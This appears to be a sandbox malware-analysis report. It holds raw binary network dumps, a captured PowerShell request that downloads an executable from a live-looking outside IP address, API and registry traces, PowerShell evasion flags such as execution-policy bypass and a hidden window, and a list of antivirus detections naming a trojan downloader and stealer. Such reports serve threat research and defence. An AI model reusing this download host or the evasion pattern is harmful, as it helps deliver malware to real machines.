Data received } þ s ~2(+*0+cs }  þ  s s'~2(+*0&ds  }  þ  s ~2(+*0&es } þ s s(+*0'fs } þ s s'(+*0"gs } þ s (+*>s'(+*Š: ríps5 zo/o+*0“h þ8þ EI+8DsÉ ~í{ù9Ïÿÿÿ& 8ÄÿÿÿþÊsý s~2(*} ~í{:Šÿÿÿ& 8ÿÿÿ0+isÍ }þÎsý s'~2(*0j þ8þ E+R8&sÑ ~í{9Ïÿÿÿ& 8Äÿÿÿ} ~í{¬9¨ÿÿÿ& 8ÿÿÿþÒsý ~2(*0+ksÕ }þÖsý s'~2(*0&lsÙ }þÚsý ~2(*0&msÝ }þÞsý s(*0'nsá }þâsý s'(*0"oså }þæsý (*>s'(*0Yp{: rps÷ z: ríps5 z(í(‹ Ý (0( (Œ Ý*(=0*qs } þ s s~2(+*0+rs } þ s s'~2(+*0&ss } þ s ~2(+*0+ts  }! þ" s s'~2(+*0&us# }$ þ% s ~2(+*0&vs& }' þ( s s(+*0'ws) }* þ+ s s'(+*0"xs, }- þ. s (+*>s'(+*0Yy{: rps÷ z: ríps5 z(+(/ Ý (0( (0 Ý*(=0(zsù }&þús1 (+:**¢~3 %:&~4 þ5 sK%€3 s6*vs6 %}7 þ8 sKs6*¶~9 %:&~: þ; s< %€9 (@s6*Šs= %}> þ? s< (@s6*s@ *vsA %}B þC sD ( +*0€ þ8þ E38*(.z}0 ~í{±:Çÿÿÿ& 8¼ÿÿÿ{09Ïÿÿÿ ~í{ :ÿÿÿ& 8’ÿÿÿ0€ þ8þ E1[8(.z}0 ~í{å9Éÿÿÿ& 8¾ÿÿÿ{09Ïÿÿÿ ~í{¾9Ÿÿÿÿ& 8”ÿÿÿ*0€ þ8þ E[/8V{09% ~í{ß:Ëÿÿÿ& 8Àÿÿÿ(.z}0 ~í{Ï9Ÿÿÿÿ& 8”ÿÿÿ*Î(2%: &rîps5 z}%:&~(1*0Z{}5}6}7}8}9( }4}3{4 (!+|4( *0Z|}E }F }G }H }I (J }K }L {K ("+|K (N *0O}s!%}O%{O( ~.%:&~þssO %€.þ"sP ((*0O}s%%}Q%{Q( ~/%:&~þtsO %€/þ&sP ((*ªs)%}S%{S( þ*sP ((*ªs-%}U%{U( þ.sP ((*0T}s1%}W%{W( ~0%9
Data received þNsø %€¶ (/*08[sš }{: r˜ ps5 zþ›sÄ (4*08\s¢ } { : rò ps5 zþ£sÄ (4*08]s¦ }{: r˜ ps5 zþ§sÄ (4*08^s® }{: rò ps5 zþ¯sÄ (4*08_s² }{: r˜ ps5 zþ³sÄ (4*0‚`sº }$}&<r‚ prƒps4 z: r¨ ps5 z{&: rò ps5 z(¯ (}+}%þ»s8 {$o7sH *08asÄ }3{3: r˜ ps5 zþÅsÄ (8*08bsÌ }<{<: rò ps5 zþÍsÄ (8*08csÐ }>{>: r˜ ps5 zþÑsÄ (8*08dsØ }H{H: r¨ ps5 zþÙs± (9*0‡esÜ }J}K}L}M{K<r‚ prƒps4 z{L: r¨ ps5 z{M: rò ps5 zþÝs8 {Jo7sH *0,5~·%:&~³þOs® %€· (?*07fsç }[{[: r˜ ps5 zþèsÄ (@*07gsï }c{c: rò ps5 zþðsÄ (@*07hsó }e{e: r˜ ps5 zþôsÄ (@*07isû }n{n: rò ps5 zþüsÄ (@*07jsÿ }p{p: r˜ ps5 zþ sÄ (@*0dks  }z}{}|{{: rÔ ps5 z{|: rò ps5 zþ s8 {zo7sH *0=<: r¨ ps5 z~¸%:&~³þPsø %€¸ (C*0=@: r¨ ps5 z~¹%:&~³þQsú %€¹ (E*0_ls  }‰}Š{‰: r¨ ps5 z{Š: r˜ ps5 zþ s² þ sú (E*0_ms  }Œ}{Œ: r¨ ps5 z{: rò ps5 zþ s² þ sÅ (F*0Hns  }: r¨ ps5 z{: r˜ ps5 zþ sÅ (F*07os#  }˜{˜: r¨ ps5 zþ$ s± (G*0dps'  }š}›}œ{›: r¨ ps5 z{œ: rò ps5 zþ( s8 {šo7sH *&~²þ*~²*"(š+*0,¤~Ó %:&~Ô þÕ sÖ %€Ó (›+*&(›+*0N¥s× }Ø <r‚ prƒps4 z{Ø : r˜ ps5 zþÙ sÚ (œ+*&(œ+*0u¦sÛ }Ü }Ý }Þ {Ý <r‚ prƒps4 z{Þ : r˜ ps5 zþß sD {Ü o& {Ü o' sà *0+Î~á %:&~â þã sè %€á (+*06§sä }å {å : r˜ ps5 zþæ s÷ (ž+*0R¨sç }è }é {é : r˜ ps5 zþê sD {è o& {è o' sà *0-©~ë %:&~ì þí sî %€ë (Ÿ+*08ªsï }ð {ð : r˜ ps5 zþñ sî (Ÿ+*08«sò }ó {ó : r˜ ps5 zþô sî (Ÿ+*0¬sõ }ö }÷ <r‚ prƒps4 z: r¨ ps5 z{÷ : r˜ ps5
Data received  *(* *6{n od *(* *6{o og *(* *6{p og *(* *6{q og *(* *B{&oLþ*&~'þ*~'*.sr €s *(* *0R þ8þ E 8**uò:óÿÿÿ ~í{:Ëÿÿÿ& 8Àÿÿÿ&~t þ*~t *(* *0” þ8þ E@<8;uò¥ò%Œò9 ~í{·9¾ÿÿÿ& 8³ÿÿÿ**{u ov :ìÿÿÿ ~í{:‰ÿÿÿ& 8~ÿÿÿ&~w þ*~w *.sx €y *(* **uòþ*&~z þ*~z *(* *0“ þ8þ E98{{ ov **8ùÿÿÿ ~í{Ô:Áÿÿÿ& 8¶ÿÿÿuò¥ò%Œò:´ÿÿÿ ~í{Å9Šÿÿÿ& 8ÿÿÿ&~| þ*~| *(* *0FŒò9{} Œòþòo~ :Œò:{} Œòþ***00 þ8þ EÇ /Ù8Â|4( ~í{:¿ÿÿÿ& 8´ÿÿÿ9 ~í{ :& 8þ E ¾ÿ,&l†¬@çk8¹Ýc 8³ÿÿÿ}: 8¡ÿÿÿr5ps÷ z{{6{7{8{9o {9oö  8[ÿÿÿ(ô : þ8=ÿÿÿ(ñ ~í{ì:&ÿÿÿ& 8ÿÿÿ{: 8 ÿÿÿ%}3 ~í{ã:ëþÿÿ& 8àþÿÿ|4(>+ 8Èþÿÿ{:&ÿÿÿ 8²þÿÿ(ó  þ8—þÿÿ%}3 8‡þÿÿ|:þ7 ~í{:gþÿÿ& 8\þÿÿÝÖ ~í{»9& 8þ EX,8Sþ}3 ~í{Ó9Îÿÿÿ& 8Ãÿÿÿ|4( ~í{õ9¢ÿÿÿ& 8—ÿÿÿÝj 8Cýÿÿ{3 ~í{Ü:'ýÿÿ& 8ýÿÿ{5 8 ýÿÿþ}3 ~í{ 9îüÿÿ& 8ãüÿÿ*A_Ó2“0P þ8þ E08+|4( ~í{¸9Îÿÿÿ& 8Ãÿÿÿ*&~;þ*~;*(* *0‘ þ8þ E¶©kB,“X8}€ ~í{9ºÿÿÿ& 8¯ÿÿÿ( } 8™ÿÿÿ}‚ þ8ÿÿÿ{  8pÿÿÿ(?+ ~í{Ø:Sÿÿÿ& 8Hÿÿÿ}ƒ þ8.ÿÿÿ| ( *}„ ~í{Ò: ÿÿÿ& 8þþÿÿ&~… þ*~… *0o“ þ8þ E,Úñ?8'{‹  ~í{Ï:Âÿÿÿ& 8·ÿÿÿ9í ~í{é:& 8þ E¡ãœ+üg—0®TxOu;‹ÃÔÛ8œ(ô 9 ~í{û:†ÿÿÿ& 8{ÿÿÿ{Œ { }‰ þ8Xÿÿÿr5ps÷ z{Œ |† þò 86ÿÿÿ{Ž  ~í{Ê:ÿÿÿ& 8ÿÿÿ}Ž ~í{Ü:óþÿÿ& 8èþÿÿ| (A+ 8Ðþÿÿ{{Œ þ‘ sˆ {’ {“ {Œ {‰ o {Œ {‰ oö  8€þÿÿ%}‹ ~í{Õ9bþÿÿ& 8WþÿÿÝ: ~í{9>þÿÿ& 83þÿÿ{Œ {” }‡ þ8þÿÿ(ó  þ8ùýÿÿ(ñ ~í{À9âýÿÿ& 8×ýÿÿ8þÿÿ 8Èýÿÿs• }Œ þ8«ýÿÿ|Ž þ7 8™ýÿÿ%}‹ ~í{9{ýÿÿ& 8pýÿÿ{Œ {†  ~í{£
Data received ÿÿÿ& $8ÿÿÿ8£ 8ùþÿÿ (8ëþÿÿ| (+ 8ÓþÿÿþòŒòþòo~ : 8¨þÿÿ{  ~í{9Œþÿÿ& 8þÿÿ{ {! o }" 8`þÿÿ8û 8Qþÿÿ{" : 8<þÿÿ}# 8*þÿÿ{$ {! {" o "8 þÿÿÝ~ ~í{ç:ðýÿÿ& 8åýÿÿ(N  ~í{Ü9Èýÿÿ& 8½ýÿÿ%} 8©ýÿÿ%} ~í{é:‹ýÿÿ& 8€ýÿÿ;œ 8þ E 0FšD°¿k/qY8+(M : ~í{à9¦ÿÿÿ& 8›ÿÿÿ%} 8‡ÿÿÿ| (+ ~í{ö:eÿÿÿ& 8Zÿÿÿ%} ~í{®9<ÿÿÿ& 81ÿÿÿ| þ× 8ÿÿÿÝù 8 ÿÿÿ{% {" {& {' o( {' oS  ~í{Ó9Îþÿÿ& 8Ãþÿÿ} ~í{©:§þÿÿ& 8œþÿÿ(N  þ8þÿÿ (T  8rþÿÿ{  8`þÿÿÝç ~í{ð9& 8þ E,S8'þò ~í{9Îÿÿÿ& 8Ãÿÿÿ{) {! {" o þ 8˜ÿÿÿÝY þ8$ûÿÿ ~í{Õ9ûÿÿ& 8ûÿÿ%} ~í{ë9êúÿÿ& 8ßúÿÿ| þ× !~í{§9¿úÿÿ& 8´úÿÿ (T  ~í{ã:—úÿÿ& 8Œúÿÿ|& (a )~í{Ó:múÿÿ& $8búÿÿ(M :" 8Lúÿÿ| (+ ,84úÿÿ(N  '~í{¾:úÿÿ& '8 úÿÿ|# þòŒòþòo~ :‡ 8ÝùÿÿŒò9 %þ8¿ùÿÿ} 8±ùÿÿ| þ× ~í{Ã9‘ùÿÿ& 8†ùÿÿ{  8tùÿÿ%} 8`ùÿÿ{#  *~í{Ø:Dùÿÿ& '89ùÿÿ(M :Hûÿÿ 8#ùÿÿ;e ~í{®:& 8þ ERÃ'‰vÕ‡=²^8{*  8¬ÿÿÿ(ñ ~í{Þ9‘ÿÿÿ& 8†ÿÿÿ{+ {! {" o 8eÿÿÿ%} ~í{:Gÿÿÿ& 8<ÿÿÿ{% {" {# {& {' o, {' oö  8ÿÿÿ}* 8îþÿÿ| ( + ~í{:Ìþÿÿ& 8ÁþÿÿÝ- 8²þÿÿ|* þ7 8œþÿÿ(ô 9+ÿÿÿ ~í{ú:|þÿÿ& 8qþÿÿ8Àþÿÿ ~í{½9Xþÿÿ& 8Mþÿÿ(ó  8:þÿÿ%} ~í{ :þÿÿ& 8þÿÿÝ£ýÿÿ ~í{÷9& 8þ E=88{- {! {"  o ~í{Õ9Áÿÿÿ& 8¶ÿÿÿÝ/ýÿÿ 8…öÿÿ{. {! {& oˆ {' oS  8WöÿÿÝÌ þ8@öÿÿ{. {! {& oˆ {' oS  ~í{Ä: öÿÿ& 8öÿÿ{# Œò:åûÿÿ ~í{â:Ýõÿÿ& 8Òõÿÿ{h~ (ð :»ÿÿÿ 8²õÿÿ{/ {! {" o +þ8‰õÿÿ{0 {! {# o1  $8jõÿÿÝñôÿÿ ~í{á9Qõÿÿ& 8FõÿÿÝÍôÿÿ #87õÿÿ þ8$õÿÿݯôÿÿ 8þ EX,8Sþ} ~í{Ü9Îÿÿÿ& 8Ãÿÿÿ|  (– ~í{Ó:¢ÿÿÿ& 8—ÿÿÿÝ ~í{ù:ÿóÿÿ& 8ôóÿÿ*| (— þ8ÔóÿÿAL%»àŽ‚¡ t  ~0P þ8þ E08+| (™ ~í{¯:Îÿÿÿ& 8Ãÿÿÿ* * *.sD €
Data received æúc7¡éø;“olBë<“…l;¤ë <†2¯ëX<†2A¤ìÌ<“×lBîØ<“ñl±îà<“ mI¤îè<ƒ20 ï¤=áMmžð¸=á‡m,žñÐ=“ÉmBôÜ=“Ým±ôä=ƒ2K ôx>á n*ŸõØ>áOn8Ÿøô>“˜nBý?“­n±ýäÂáé/>ý|ÆáJ0§ýØÆ“ÃnBþÜÆ“În±þ?“ñnì¤þ|?“o¥àÆáé/> €ÐáJ0§ ÜГoB àГ­o± ô?ƒ2ä¥  @æ ApsE0@æ gpsEH@æu2>Ô@ƒ2 ¦A“›pB A“®p3¦Aƒ2\HAæ ApsEXAæ gpsEpAæu2>üAƒ2@0B“NqB <B“bq± DB†2> ”B†2 àB†2ÜF!,C„2ãF#xC“†qB%„C“‘qI¦%Æ ApsE%Æ gpsE%ŒCæ²qO¦%,E†2>'4E“æqB'@E“r±'HE‘©. 'äF–sئ'I–:s§*ÐQ–]sq§,ØU‘ßs¶§0xY–Rtø§5ˆ[–jt1¨7@^–‰ti¨8$`–Ýt¢¨9àa–…uר<Pb–´uò¨=`b–Ìuù¨>hb“ÚuB?tb“òu©?|b†uvq?„b‰v\?Üb†¡vq@äbµv\@<c†¾vqADc×v\Aœc†èv©B¤cùv©Büc†2©Cød†2DLew>E¸g†2w©EhlÆ£ÞùE¸m†Îw’©Eüo‘©. Fpp“ûwBF|p“x§©F„p–FxئF q–kx§I¼r–€xéKðr–·xü©MŒs‘ÍxÚªN,t‘æxb«Oèt‘y¬P„u‘©. Qu“>yBQœu“Iy¬QäБ©. QðІ2>QøЃy1¬Q¤uæ²qJ¬R¼u†2>TÄu‘©. T€S†2>TˆS‘©. TS¾‹ T˜k“à‹BT¤k“󋑬TZ0Z0Z0Ý2c3l3a4È4Î4ý5ð67757?7[7f7o7¼7ß7è7ù788)818P888¬8´8 99 99Û9â9ú9:C:J:T:³:¾:18à:¾:ä:÷:7ý:;;$;T:);c3è7G;M;h;j;ä:o;÷:è7‹;;“;˜;ž;¸;¾;T:Ä;Ê;Ö;Ü;à:¾;ñ;ù;þ;< < <&<+</<6<“;=<E<J<d<$;‹;j<m<t<z<€<œ<¡<¥<M;«<±<¶<½<œ<$;Î<;ê<ñ;;¡<o7Ä;œ<¾; =$= =ê<9=o;Ý2V=Z=6<m=r=/<}=‚=‡=¶<÷:J: 9¤=«=²=¼=÷:Ú=‹;Ü=å=ï=ú=J<
Data received a21944008a8a15894062ee39m_6d9a8b05cbdf4c0c9b7fe98b03b55b20m_0c4dfc4479bd4ef18f374c344282aaa6m_a2d1f1b039cd449ebdaf219b17c6bea7m_9e6716b037714c84ab82b1faabd2f2fdm_64506662cf7842acb3bf8bb434de5399m_33060469675e42358c788239441fb0bem_a71d774a9ca1403395767cf489cfe766m_89a828a1e295432f972f93510564bd2cm_73291d1930d043f6949bddcd633f187bm_4bc0e4018ff740b0ab978d472ceabe97m_0c8b5cfd703347c5ad5f376cdffc4154m_e7c83685c9bd480db8683eb5e7a65a2fm_3260ffba554248e9a2f80bae2a6c9a90m_2ae168926dc84e61ba18683cc4adb384m_2fd7585379514b8fad7bfb98e1e90942m_4e60045439ef40099b3a21092a89e042m_a837ff6878d34fce96db6321abf52fa0m_f0e1ede0b64e44c987d1575c70d81f52m_cb9458b582d34b61a6f409d534832d26m_84cb4e4de21a44628f008488134fca6bm_4568e30785a345ad9ff596a6bddd16d7m_f0420edb25eb4a74af225c8b2079872am_c857b50381ff42148af7bd47ec91e62bm_cc4bf4b001fa4027af957a1400fe3a47m_bc0dca594db0414b84beb1d75868f961m_5b5c938dbca94321a6d145af06465de5m_d1504b1836b9450aa5eaa16f5d5349f7m_2d0c61d43f814bdfae8b1226e6ded00em_fbf9162948ec479887ecc26be963ff9em_b09d8efc18b74dffbc10a417d117fd22m_7f223beaa6ef4c109f534dfb4a6e420fm_feb867f0b491455b93c15bd9f6e23575m_ab02f1a9bbd74708a0bcb8d202384ee3m_a60ed7c50058487aa472fa09290b369dm_ad589894a8c04d9ca1a02f9f7c025cf6m_76a87639658e484da97969b39c229b02m_8e77ccd3d3df4010ae10216147953df1m_cc069bc68a2a43819a96aafb79918b8cm_ccd201a12bd5417aa3a77b38c9cbbc3bm_8b02747aab314f0a8832b49a65bddedem_fe91a03c37d64511b36bbed3e37bc125m_02eaa3de8d324c078beec130917bad60m_7b651da98086499faba2d2d7b0a11ec1m_80014bfaab5248ce86dda743c9d74f85m_e02c0da23f7a41d3b8363100d48210ecm_39fdcf6d69a742afa91c5f5a8d91863fm_71df0beb11274fcbac02c114b62624dcm_3a28940418104c378961dd70fce85e77m_377de577e6ab4ddca3450992ebb3758fm_29372bbc5b2048eca660a3706809b57cm_ef03b491b8d24213868b577ec8bc5e49RecordEfficientFinderj6876e9f8941140c2965409abcf1eec11RecordLocalCommandMonitorLogicalNodeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeDebuggableAttributeSystem.DiagnosticsDebuggingModesAssemblyTitleAttributeAssemblyDescriptionAttributeAssemblyConfigurationAttributeAssemblyCompanyAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyTrademarkAttributeGuidAttributeSystem.Runtime.InteropServicesAssemblyFileVersionAttributeTargetFrameworkAttributeSystem.Runtime.VersioningComVisibleAttributeAsyncStateMachineAttributeGeneratedCodeAttributeSystem.CodeDom.CompilerDebuggerNonUserCodeAttributeCompilerGeneratedAttributeEditorBrowsableAttributeSystem.ComponentModelEditorBrowsableStateDebuggerStepThroughAttributeObsoleteAttributeParamArrayAttributeExtensionAttributeDefaultMemberAttributeIteratorStateMachineAttributeDebuggerHiddenAttributeRarfa.Properties.Resources.resourcesKNfmK2LSN78XMPCE63G.rtYh3nchO67iKtBnFewdrTBYGHSEJ/eHleXbVA=1vGXREYTyDj6aPDGMAwxPHA=
Data sent GET /a0001/0228/rocktraining.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.112 Host: 23.27.46.60 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
host 23.27.46.60
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
Time & API Arguments Status Return Repeated

send

 buffer: GET /a0001/0228/rocktraining.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.112 Host: 23.27.46.60 Connection: Keep-Alive
socket: 1260
sent: 182
1 182 0
Time & API Arguments Status Return Repeated

recv

 buffer: HTTP/1.1 200 OK Date: Mon, 03 Mar 2025 05:47:34 GMT Server: Apache/2.4.58 (Ubuntu) Last-Modified: Fri, 28 Feb 2025 09:52:00 GMT ETag: "1d7400-62f30c2019678" Accept-Ranges: bytes Content-Length: 1930240 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELì†Ágà jŽˆ  @ à`…@ˆK ¸À  H.text”h j `.rsrc¸ l@@.reloc Àr@BpˆH¬klä*(*0£ þ8þ EoH28j|(+ ~í{ì9Äÿÿÿ& 8¹ÿÿÿ( } 8£ÿÿÿ} ~í{Ü9‡ÿÿÿ& 8|ÿÿÿ|( *0z þ8þ E18,*(o  ~í{È9Éÿÿÿ& 8¾ÿÿÿ( ~í{Æ:£ÿÿÿ& 8˜ÿÿÿ&~þ*~*0/( }}|(+|( *0/( } } | (+| ( *0  þ8þ E 8›($ o%  ~í{Ì9& 8þ E8ÝW& ~í{»:& 8þ E8s# z ~í{é:^ÿÿÿ& 8Sÿÿÿ*%Ch8&~þ*~*0¥  þ8þ E+R8&s ~í{ö:Ïÿÿÿ& 8Äÿÿÿ} ~í{À:¨ÿÿÿ& 8ÿÿÿo& þs' (+%() :8s# z*&~þ*~*0Î  þ8þ E8*o- :s# zo. & ~í{°9& 8þ E8Ý­ÿÿÿ& ~í{ú9& 8þ E8s# z ~í{:Oÿÿÿ& 8Dÿÿÿ&Qw8&~þ*~*(* *0” þ8þ EBk8r­pÐ (/ o0 s1 € ~í{Æ:¸ÿÿÿ& 8­ÿÿÿ~: ~í{Å:ÿÿÿ& 8„ÿÿÿ~*~*€*j(#rãp~o2 t*&~þ*~*0”  þ8þ E:085~ %:@& ~í{:Êÿÿÿ& 8¿ÿÿÿ(,*~þes3 %€  ~í{î:‰ÿÿÿ& 8~ÿÿÿ&(,*0”  þ8þ E:085~!%:@& ~í{Æ9Êÿÿÿ& 8¿ÿÿÿ(,*~þfs3 %€! ~í{Í:‰ÿÿÿ& 8~ÿÿÿ0¤ sƒ }>=r÷prps4 z<r_prƒps4 z{>: rÝps5 z(ã }? ÿÿÿY> ÿÿÿ8X (ã }@þ„s6 {?{@sµ *0™ þ8þ E?8:(0*~"%986& ~í{ú:»ÿÿÿ& 8°ÿÿÿ~
received: 2920
socket: 1260
1 2920 0
option -ep bypass value Attempts to bypass execution policy
option -nop value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
Lionic Trojan.Win32.Generic.4!c
MicroWorld-eScan Trojan.GenericKD.75920225
CTX exe.trojan.generic
CAT-QuickHeal Trojan.Ghanarava.1740911495993e3f
Skyhigh BehavesLike.Win64.Downloader.ct
Cylance Unsafe
VIPRE Heur.BZC.MNT.Boxter.928.75BC3D13
CrowdStrike win/malicious_confidence_100% (W)
Symantec Trojan.Gen.MBT
ESET-NOD32 a variant of Generik.FIGRVEL
Paloalto generic.ml
Cynet Malicious (score: 99)
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Trojan.GenericKD.75920225
Emsisoft Trojan.GenericKD.75920225 (B)
F-Secure Trojan.TR/AVI.Agent.snbwc
McAfeeD ti!370E0CEDD9A4
Sophos Mal/Generic-S
Ikarus Trojan.Win32.Themida
FireEye Trojan.GenericKD.75920225
Google Detected
Avira TR/AVI.Agent.snbwc
Kingsoft Win32.Troj.Unknown.a
Arcabit Trojan.Generic.D4867361
Microsoft Trojan:Win32/Wacatac.B!ml
Varist W64/ABTrojan.UCSM-7856
AhnLab-V3 Trojan/Win.Malware-gen.C5735873
DeepInstinct MALICIOUS
Malwarebytes Malware.AI.325968088
TrendMicro-HouseCall TrojanSpy.Win64.STRELASTEALER.YXFB2Z
Tencent Win32.Trojan-Downloader.Agent.Fdhl
Fortinet PossibleThreat.MU
Panda Trj/Chgt.AD